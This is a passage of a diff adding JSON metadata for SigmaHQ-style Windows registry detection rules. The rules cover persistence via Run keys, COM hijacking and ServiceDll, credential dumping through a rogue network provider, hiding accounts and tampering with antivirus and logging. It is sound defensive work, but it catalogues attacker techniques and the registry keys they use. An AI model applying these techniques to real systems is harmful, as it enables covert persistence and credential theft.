+ ], + "filename": "registry_set_new_application_appcompat.yml", + "level": "informational", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "https://github.com/OTRF/detection-hackathon-apt29/issues/1", + "https://threathunterplaybook.com/evals/apt29/detections/1.A.1_DFD6A782-9BDB-4550-AB6B-525E825B095E.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_new_application_appcompat.yml" + ], + "tags": [ + "attack.execution", + "attack.t1204.002" + ] + }, + "uuid": "60936b49-fca0-4f32-993d-7415edcf9a5d", + "value": "New Application in AppCompat" + }, + { + "description": "Detects when an attacker tries to add a new network provider in order to dump clear text credentials, similar to how the NPPSpy tool does it", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/08/23", + "falsepositive": [ + "Other legitimate network providers used and not filtred in this rule" + ], + "filename": "registry_set_new_network_provider.yml", + "level": "high", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "https://docs.microsoft.com/en-us/troubleshoot/windows-client/deployment/network-provider-settings-removed-in-place-upgrade", + "https://github.com/gtworek/PSBits/tree/master/PasswordStealing/NPPSpy", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_new_network_provider.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003" + ] + }, + "uuid": "0442defa-b4a2-41c9-ae2c-ea7042fc4701", + "value": "New Network Provider - Registry" + }, + { + "description": "Enable Dynamic Data Exchange protocol (DDE) in all supported editions of Microsoft Word or Excel.", + "meta": { + "author": "frack113", + "creation_date": "2022/02/26", + "falsepositive": [ + "Unknown" + ], + "filename": "registry_set_office_enable_dde.yml", + "level": "medium", + "logsource.category": "registry_set", + 
"logsource.product": "windows", + "refs": [ + "https://msrc.microsoft.com/update-guide/vulnerability/ADV170021", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_office_enable_dde.yml" + ], + "tags": [ + "attack.execution", + "attack.t1559.002" + ] + }, + "uuid": "63647769-326d-4dde-a419-b925cc0caf42", + "value": "Enable Microsoft Dynamic Data Exchange" + }, + { + "description": "Detects registry changes to Office macro settings. The TrustRecords contain information on executed macro-enabled documents. (see references)", + "meta": { + "author": "Trent Liffick (@tliffick)", + "creation_date": "2020/05/22", + "falsepositive": [ + "Valid Macros and/or internal documents" + ], + "filename": "registry_set_office_security.yml", + "level": "high", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/inversecos/status/1494174785621819397", + "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/zloader-with-a-new-infection-technique/", + "https://securelist.com/scarcruft-surveilling-north-korean-defectors-and-human-rights-activists/105074/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_office_security.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1112" + ] + }, + "uuid": "a166f74e-bf44-409d-b9ba-ea4b2dd8b3cd", + "value": "Office Security Settings Changed" + }, + { + "description": "Detects persistence via Visual Studio Tools for Office (VSTO) add-ins in Office applications.", + "meta": { + "author": "Bhabesh Raj", + "creation_date": "2021/01/10", + "falsepositive": [ + "Legitimate Addin Installation" + ], + "filename": "registry_set_office_vsto_persistence.yml", + "level": "medium", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/_vivami/status/1347925307643355138", + "https://vanmieghem.io/stealth-outlook-persistence/", + 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_office_vsto_persistence.yml" + ], + "tags": [ + "attack.t1137.006", + "attack.persistence" + ] + }, + "uuid": "9d15044a-7cfe-4d23-8085-6ebc11df7685", + "value": "Stealthy VSTO Persistence" + }, + { + "description": "Detects the modification of Outlook Security Setting to allow unprompted execution. Goes with win_outlook_c2_macro_creation.yml and is particularly interesting if both events occur near to each other.", + "meta": { + "author": "@ScoubiMtl", + "creation_date": "2021/04/05", + "falsepositive": [ + "Unlikely" + ], + "filename": "registry_set_outlook_c2_registry_key.yml", + "level": "medium", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "https://www.mdsec.co.uk/2020/11/a-fresh-outlook-on-mail-based-persistence/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_outlook_c2_registry_key.yml" + ], + "tags": [ + "attack.persistence", + "attack.command_and_control", + "attack.t1137", + "attack.t1008", + "attack.t1546" + ] + }, + "uuid": "e3b50fa5-3c3f-444e-937b-0a99d33731cd", + "value": "Outlook C2 Registry Key" + }, + { + "description": "Detects the manipulation of persistent URLs which could execute malicious code", + "meta": { + "author": "Tobias Michalski", + "creation_date": "2021/06/10", + "falsepositive": [ + "Unknown" + ], + "filename": "registry_set_outlook_registry_todaypage.yml", + "level": "high", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "https://speakerdeck.com/heirhabarov/hunting-for-persistence-via-microsoft-exchange-server-or-outlook?slide=70", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_outlook_registry_todaypage.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1112" + ] + }, + "uuid": "487bb375-12ef-41f6-baae-c6a1572b4dd1", + "value": "Persistent Outlook 
Landing Today Pages" + }, + { + "description": "Detects the manipulation of persistent URLs which can be malicious", + "meta": { + "author": "Tobias Michalski", + "creation_date": "2021/06/09", + "falsepositive": [ + "Unknown" + ], + "filename": "registry_set_outlook_registry_webview.yml", + "level": "high", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "https://speakerdeck.com/heirhabarov/hunting-for-persistence-via-microsoft-exchange-server-or-outlook?slide=70", + "https://support.microsoft.com/en-us/topic/outlook-home-page-feature-is-missing-in-folder-properties-d207edb7-aa02-46c5-b608-5d9dbed9bd04?ui=en-us&rs=en-us&ad=us", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_outlook_registry_webview.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1112" + ] + }, + "uuid": "ddd171b5-2cc6-4975-9e78-f0eccd08cc76", + "value": "Persistent Outlook Landing Pages" + }, + { + "description": "Change outlook email security settings", + "meta": { + "author": "frack113", + "creation_date": "2021/12/28", + "falsepositive": [ + "Administrative scripts" + ], + "filename": "registry_set_outlook_security.yml", + "level": "medium", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1137/T1137.md", + "https://docs.microsoft.com/en-us/outlook/troubleshoot/security/information-about-email-security-settings", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_outlook_security.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1137" + ] + }, + "uuid": "c3cefdf4-6703-4e1c-bad8-bf422fc5015a", + "value": "Change Outlook Security Setting in Registry" + }, + { + "description": "Detects potential persistence using Appx DebugPath", + "meta": { + "author": "frack113", + "creation_date": "2022/07/27", + 
"falsepositive": [ + "Unknown" + ], + "filename": "registry_set_persistence_appx_debugger.yml", + "level": "medium", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "https://oddvar.moe/2018/09/06/persistence-using-universal-windows-platform-apps-appx/", + "https://github.com/rootm0s/WinPwnage", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_persistence_appx_debugger.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1546.015" + ] + }, + "uuid": "df4dc653-1029-47ba-8231-3c44238cc0ae", + "value": "Windows Registry Persistence DebugPath" + }, + { + "description": "Detects change the the \"AutodialDLL\" key which could be used as a persistence method to load custom DLL via the \"ws2_32\" library", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/08/10", + "falsepositive": [ + "Unlikely" + ], + "filename": "registry_set_persistence_autodial_dll.yml", + "level": "high", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "https://www.hexacorn.com/blog/2015/01/13/beyond-good-ol-run-key-part-24/", + "https://persistence-info.github.io/Data/autodialdll.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_persistence_autodial_dll.yml" + ], + "tags": [ + "attack.persistence" + ] + }, + "uuid": "e6fe26ee-d063-4f5b-b007-39e90aaf50e3", + "value": "Persistence Via AutodialDLL" + }, + { + "description": "Detects potential COM object hijacking where the \"Server\" (In/Out) is pointing to a supsicious or unsuale location", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/07/28", + "falsepositive": [ + "Probable legitimate applications. 
If you find these please add them to an exclusion list" + ], + "filename": "registry_set_persistence_com_hijacking_susp_locations.yml", + "level": "high", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "https://www.microsoft.com/security/blog/2022/07/27/untangling-knotweed-european-private-sector-offensive-actor-using-0-day-exploits/ (idea)", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_persistence_com_hijacking_susp_locations.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1546.015" + ] + }, + "uuid": "3d968d17-ffa4-4bc0-bfdc-f139de76ce77", + "value": "COM Hijacking For Persistence With Suspicious Locations" + }, + { + "description": "Detects modification to the \"Default\" value of the \"MyComputer\" key and subkeys to point to a custom binary that will be launched whenever the associated action is executed (see reference section for example)", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/08/09", + "falsepositive": [ + "Unlikely but if you experience FPs add specific processes and locations you would like to monitor for" + ], + "filename": "registry_set_persistence_mycomputer.yml", + "level": "high", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "https://www.hexacorn.com/blog/2017/01/18/beyond-good-ol-run-key-part-55/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_persistence_mycomputer.yml" + ], + "tags": [ + "attack.persistence" + ] + }, + "uuid": "8fbe98a8-8f9d-44f8-aa71-8c572e29ef06", + "value": "Persistence Via MyComputer Key and SubKeys" + }, + { + "description": "Detects potential COM object hijacking leveraging the COM Search Order", + "meta": { + "author": "Maxime Thiebaut (@0xThiebaut), oscd.community, Cédric Hien", + "creation_date": "2020/04/14", + "falsepositive": [ + "Some installed utilities (i.e. 
OneDrive) may serve new COM objects at user-level" + ], + "filename": "registry_set_persistence_search_order.yml", + "level": "medium", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "https://www.cyberbit.com/blog/endpoint-security/com-hijacking-windows-overlooked-security-vulnerability/", + "https://attack.mitre.org/techniques/T1546/015/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_persistence_search_order.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1546.015" + ] + }, + "uuid": "a0ff33d8-79e4-4cef-b4f3-9dc4133ccd12", + "value": "Windows Registry Persistence COM Search Order Hijacking" + }, + { + "description": "Detects modification addition to the 'TypedPaths' key in the user or admin registry from a non standard application. Which might indicate persistence attempt", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/08/22", + "falsepositive": [ + "Unlikely" + ], + "filename": "registry_set_persistence_typed_paths.yml", + "level": "high", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/dez_/status/1560101453150257154", + "https://forensafe.com/blogs/typedpaths.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_persistence_typed_paths.yml" + ], + "tags": [ + "attack.persistence" + ] + }, + "uuid": "086ae989-9ca6-4fe7-895a-759c5544f247", + "value": "Persistence Via TypedPaths" + }, + { + "description": "Detects tampering with attachment manager settings policies associations to lower the default file type risks (See reference for more information)", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/08/01", + "falsepositive": [ + "Unlikely" + ], + "filename": "registry_set_policies_associations_tamper.yml", + "level": "high", + "logsource.category": "registry_set", + "logsource.product": "windows", 
+ "refs": [ + "https://support.microsoft.com/en-us/topic/information-about-the-attachment-manager-in-microsoft-windows-c48a4dcd-8de5-2af5-ee9b-cd795ae42738", + "https://www.virustotal.com/gui/file/2bcd5702a7565952c44075ac6fb946c7780526640d1264f692c7664c02c68465", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_policies_associations_tamper.yml" + ], + "tags": [ + "attack.defense_evasion" + ] + }, + "uuid": "a9b6c011-ab69-4ddb-bc0a-c4f21c80ec47", + "value": "Modify Attachment Manager Settings - Associations" + }, + { + "description": "Detects tampering with attachment manager settings policies attachments (See reference for more information)", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/08/01", + "falsepositive": [ + "Unlikely" + ], + "filename": "registry_set_policies_attachments_tamper.yml", + "level": "high", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "https://support.microsoft.com/en-us/topic/information-about-the-attachment-manager-in-microsoft-windows-c48a4dcd-8de5-2af5-ee9b-cd795ae42738", + "https://www.virustotal.com/gui/file/2bcd5702a7565952c44075ac6fb946c7780526640d1264f692c7664c02c68465", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_policies_attachments_tamper.yml" + ], + "tags": [ + "attack.defense_evasion" + ] + }, + "uuid": "ee77a5db-b0f3-4be2-bfd4-b58be1c6b15a", + "value": "Modify Attachment Manager Settings - Attachments" + }, + { + "description": "Detects that a powershell code is written to the registry as a service.", + "meta": { + "author": "oscd.community, Natalia Shornikova", + "creation_date": "2020/10/06", + "falsepositive": [ + "Unknown" + ], + "filename": "registry_set_powershell_as_service.yml", + "level": "high", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + 
"https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_powershell_as_service.yml" + ], + "tags": [ + "attack.execution", + "attack.t1569.002" + ] + }, + "uuid": "4a5f5a5e-ac01-474b-9b4e-d61298c9df1d", + "value": "PowerShell as a Service in Registry" + }, + { + "description": "Adds a RUN key that contains a powershell keyword", + "meta": { + "author": "frack113, Florian Roth", + "creation_date": "2022/03/17", + "falsepositive": [ + "Legitimate admin or third party scripts" + ], + "filename": "registry_set_powershell_in_run_keys.yml", + "level": "medium", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "https://github.com/frack113/atomic-red-team/blob/a9051c38de8a5320b31c7039efcbd3b56cf2d65a/atomics/T1547.001/T1547.001.md#atomic-test-9---systembc-malware-as-a-service-registry", + "https://www.trendmicro.com/en_us/research/22/j/lv-ransomware-exploits-proxyshell-in-attack.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_powershell_in_run_keys.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1547.001" + ] + }, + "uuid": "8d85cf08-bf97-4260-ba49-986a2a65129c", + "value": "Powershell in Windows Run Keys" + }, + { + "description": "Detects the modification of the registry of the currently logged in user to disable PowerShell module logging, script block logging or transcription and script execution logging", + "meta": { + "author": "frack113", + "creation_date": "2022/04/02", + "falsepositive": [ + "Unknown" + ], + "filename": "registry_set_powershell_logging_disabled.yml", + "level": "medium", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1112/T1112.md#atomic-test-32---windows-powershell-logging-disabled", + 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_powershell_logging_disabled.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1564.001" + ] + }, + "uuid": "fecfd1a1-cc78-4313-a1ea-2ee2e8ec27a7", + "value": "PowerShell Logging Disabled" + }, + { + "description": "Detects when a new custom protocole handler is registered", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/05/30", + "falsepositive": [ + "Legitimate applications registering a new custom protocol handler" + ], + "filename": "registry_set_register_custom_protocol_handler.yml", + "level": "medium", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "https://ladydebug.com/blog/2019/06/21/custom-protocol-handler-cph/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_register_custom_protocol_handler.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1112" + ] + }, + "uuid": "fdbf0b9d-0182-4c43-893b-a1eaab92d085", + "value": "Newly Registered Protocol Handler" + }, + { + "description": "Detects non-sysinternals tools setting the \"accepteula\" key which normally is set on sysinternals tool execution", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/08/24", + "falsepositive": [ + "Unlikely" + ], + "filename": "registry_set_renamed_sysinternals_eula_accepted.yml", + "level": "high", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "Internal Research", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_renamed_sysinternals_eula_accepted.yml" + ], + "tags": [ + "attack.resource_development", + "attack.t1588.002" + ] + }, + "uuid": "8023f872-3f1d-4301-a384-801889917ab4", + "value": "Usage of Renamed Sysinternals Tools - RegistrySet" + }, + { + "description": "Detect use of scrobj.dll as this DLL looks for the ScriptletURL key 
to get the location of the script to execute", + "meta": { + "author": "frack113", + "creation_date": "2022/08/20", + "falsepositive": [ + "Legitimate use of the dll." + ], + "filename": "registry_set_scrobj_dll_persistence.yml", + "level": "medium", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1546.015/T1546.015.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_scrobj_dll_persistence.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1546.015" + ] + }, + "uuid": "fe20dda1-6f37-4379-bbe0-a98d400cae90", + "value": "Scrobj.dll COM Hijacking" + }, + { + "description": "Detects registry key established after masqueraded .scr file execution using Rundll32 through desk.cpl", + "meta": { + "author": "Jose Luis Sanchez Martinez (@Joseliyo_Jstnk)", + "creation_date": "2022/05/04", + "falsepositive": [ + "Legitimate use of screen saver" + ], + "filename": "registry_set_scr_file_executed_by_rundll32.yml", + "level": "medium", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/VakninHai/status/1517027824984547329", + "https://twitter.com/pabraeken/status/998627081360695297", + "https://jstnk9.github.io/jstnk9/research/InstallScreenSaver-SCR-files", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_scr_file_executed_by_rundll32.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218.011" + ] + }, + "uuid": "40b6e656-4e11-4c0c-8772-c1cc6dae34ce", + "value": "ScreenSaver Registry Key Set" + }, + { + "description": "Detects changes to the \"ServiceDLL\" value related to a service in the registry. 
This is often used as a method of persistence.", + "meta": { + "author": "frack113", + "creation_date": "2022/02/04", + "falsepositive": [ + "Administrative scripts", + "Installation of a service" + ], + "filename": "registry_set_servicedll_hijack.yml", + "level": "medium", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1543.003/T1543.003.md#atomic-test-4---tinyturla-backdoor-service-w64time", + "https://www.hexacorn.com/blog/2013/09/19/beyond-good-ol-run-key-part-4/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_servicedll_hijack.yml" + ], + "tags": [ + "attack.persistence", + "attack.privilege_escalation", + "attack.t1543.003" + ] + }, + "uuid": "612e47e9-8a59-43a6-b404-f48683f45bd6", + "value": "ServiceDll Hijack" + }, + { + "description": "Detects registry modifications that disable internal tools or functions in explorer (malware like Agent Tesla uses this technique)", + "meta": { + "author": "frack113", + "creation_date": "2022/03/18", + "falsepositive": [ + "Legitimate admin script" + ], + "filename": "registry_set_set_nopolicies_user.yml", + "level": "medium", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1112/T1112.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_set_nopolicies_user.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1112" + ] + }, + "uuid": "1c3121ed-041b-4d97-a075-07f54f20fb4a", + "value": "Registry Explorer Policy Modification" + }, + { + "description": "Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by application shims.\nThe Microsoft Windows Application Compatibility 
Infrastructure/Framework (Application Shim) was created to allow for backward compatibility of software as the operating system codebase changes over time\n", + "meta": { + "author": "frack113", + "creation_date": "2021/12/30", + "falsepositive": [ + "Unknown" + ], + "filename": "registry_set_shim_databases_persistence.yml", + "level": "medium", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1546.011/T1546.011.md#atomic-test-3---registry-key-creation-andor-modification-events-for-sdb", + "https://www.fireeye.com/blog/threat-research/2017/05/fin7-shim-databases-persistence.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_shim_databases_persistence.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1546.011" + ] + }, + "uuid": "dfb5b4e8-91d0-4291-b40a-e3b0d3942c45", + "value": "Registry Key Creation or Modification for Shim DataBase" + }, + { + "description": "Detects changes to the Registry in which a monitor program gets registered to monitor the exit of another process", + "meta": { + "author": "Florian Roth", + "creation_date": "2021/02/26", + "falsepositive": [ + "Unknown" + ], + "filename": "registry_set_silentprocessexit.yml", + "level": "high", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "https://oddvar.moe/2018/04/10/persistence-using-globalflags-in-image-file-execution-options-hidden-from-autoruns-exe/", + "https://www.deepinstinct.com/2021/02/16/lsass-memory-dumps-are-stealthier-than-ever-before-part-2/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_silentprocessexit.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1546.012" + ] + }, + "uuid": "c81fe886-cac0-4913-a511-2822d72ff505", + "value": "SilentProcessExit Monitor Registration" + }, + { + 
"description": "Detects when an attacker register a new SIP provider for persistence and defense evasion", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/07/21", + "falsepositive": [ + "Legitimate SIP being registered by the OS or different software." + ], + "filename": "registry_set_sip_persistence.yml", + "level": "medium", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "https://persistence-info.github.io/Data/codesigning.html", + "https://github.com/gtworek/PSBits/tree/master/SIP", + "https://specterops.io/assets/resources/SpecterOps_Subverting_Trust_in_Windows.pdf", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_sip_persistence.yml" + ], + "tags": [ + "attack.persistence", + "attack.defense_evasion", + "attack.t1553.003" + ] + }, + "uuid": "5a2b21ee-6aaa-4234-ac9d-59a59edf90a1", + "value": "Persistence Via New SIP Provider" + }, + { + "description": "Detects tamper attempts to sophos av functionality via registry key modification", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/09/02", + "falsepositive": [ + "Some FP may occure when the feature is disabled by the AV itself, you should always investigate if the action was legitimate" + ], + "filename": "registry_set_sophos_av_tamaper.yml", + "level": "high", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "https://redacted.com/blog/bianlian-ransomware-gang-gives-it-a-go/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_sophos_av_tamaper.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562.001" + ] + }, + "uuid": "9f4662ac-17ca-43aa-8f12-5d7b989d0101", + "value": "Tamper With Sophos AV Registry Keys" + }, + { + "description": "Detects when an attacker set the registry key \"HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\SpecialAccounts\\Userlist\" 
to \"0\" in order to hide user account.", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/07/12", + "falsepositive": [ + "Unknown" + ], + "filename": "registry_set_special_accounts.yml", + "level": "high", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "https://thedfirreport.com/2022/07/11/select-xmrig-from-sqlserver/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_special_accounts.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1564.002" + ] + }, + "uuid": "f8aebc67-a56d-4ec9-9fbe-7b0e8b7b4efd", + "value": "Hide User Account Via Special Accounts Reg Key" + }, + { + "description": "Detect set Notification_Suppress to 1 to disable the windows security center notification", + "meta": { + "author": "frack113", + "creation_date": "2022/08/19", + "falsepositive": [ + "Unknown" + ], + "filename": "registry_set_suppress_defender_notifications.yml", + "level": "medium", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1112/T1112.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_suppress_defender_notifications.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1112" + ] + }, + "uuid": "0c93308a-3f1b-40a9-b649-57ea1a1c1d63", + "value": "Activate Suppression of Windows Security Center Notifications" + }, + { + "description": "Detects changes to the \"Default\" property for keys located in the \\Software\\Microsoft\\Windows\\CurrentVersion\\App Paths\\ registry. 
Which might be used as a method of persistence\nThe entries found under App Paths are used primarily for the following purposes.\nFirst, to map an application's executable file name to that file's fully qualified path.\nSecond, to pre-pend information to the PATH environment variable on a per-application, per-process basis.\n", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/08/10", + "falsepositive": [ + "Legitimate applications registering their binary from on of the suspicious locations mentioned above (tune it)" + ], + "filename": "registry_set_susp_app_paths_persistence.yml", + "level": "high", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "https://www.hexacorn.com/blog/2013/01/19/beyond-good-ol-run-key-part-3/", + "https://docs.microsoft.com/en-us/windows/win32/shell/app-registration?redirectedfrom=MSDN", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_susp_app_paths_persistence.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1546.012" + ] + }, + "uuid": "707e097c-e20f-4f67-8807-1f72ff4500d6", + "value": "Suspicious Values In App Paths Default Property" + }, + { + "description": "Detects the keyboard preload installation with a suspicious keyboard layout, e.g. 
Chinese, Iranian or Vietnamese layout load in user session on systems maintained by US staff only", + "meta": { + "author": "Florian Roth", + "creation_date": "2019/10/12", + "falsepositive": [ + "Administrators or users that actually use the selected keyboard layouts (heavily depends on the organisation's user base)" + ], + "filename": "registry_set_susp_keyboard_layout_load.yml", + "level": "medium", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "https://renenyffenegger.ch/notes/Windows/registry/tree/HKEY_CURRENT_USER/Keyboard-Layout/Preload/index", + "https://github.com/SwiftOnSecurity/sysmon-config/pull/92/files", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_susp_keyboard_layout_load.yml" + ], + "tags": [ + "attack.resource_development", + "attack.t1588.002" + ] + }, + "uuid": "34aa0252-6039-40ff-951f-939fd6ce47d8", + "value": "Suspicious Keyboard Layout Load" + }, + { + "description": "Detects a suspicious printer driver installation with an empty Manufacturer value", + "meta": { + "author": "Florian Roth", + "creation_date": "2020/07/01", + "falsepositive": [ + "Alerts on legitimate printer drivers that do not set any more details in the Manufacturer value" + ], + "filename": "registry_set_susp_printer_driver.yml", + "level": "high", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/SBousseaden/status/1410545674773467140", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_susp_printer_driver.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.t1574", + "cve.2021.1675" + ] + }, + "uuid": "e0813366-0407-449a-9869-a2db1119dc41", + "value": "Suspicious Printer Driver Empty Manufacturer" + }, + { + "description": "Detects a possible persistence mechanism using RUN key for Windows Explorer and pointing to a suspicious folder", + "meta": { + "author": 
"Florian Roth, oscd.community", + "creation_date": "2018/07/18", + "falsepositive": [ + "Unknown" + ], + "filename": "registry_set_susp_reg_persist_explorer_run.yml", + "level": "high", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "https://researchcenter.paloaltonetworks.com/2018/07/unit42-upatre-continues-evolve-new-anti-analysis-techniques/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_susp_reg_persist_explorer_run.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1547.001" + ] + }, + "uuid": "b7916c2a-fa2f-4795-9477-32b731f70f11", + "value": "Registry Persistence via Explorer Run Key" + }, + { + "description": "Detects suspicious new RUN key element pointing to an executable in a suspicious folder", + "meta": { + "author": "Florian Roth, Markus Neis, Sander Wiebing", + "creation_date": "2018/08/25", + "falsepositive": [ + "Software using weird folders for updates" + ], + "filename": "registry_set_susp_run_key_img_folder.yml", + "level": "high", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "https://www.fireeye.com/blog/threat-research/2018/08/fin7-pursuing-an-enigmatic-and-evasive-global-criminal-operation.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_susp_run_key_img_folder.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1547.001" + ] + }, + 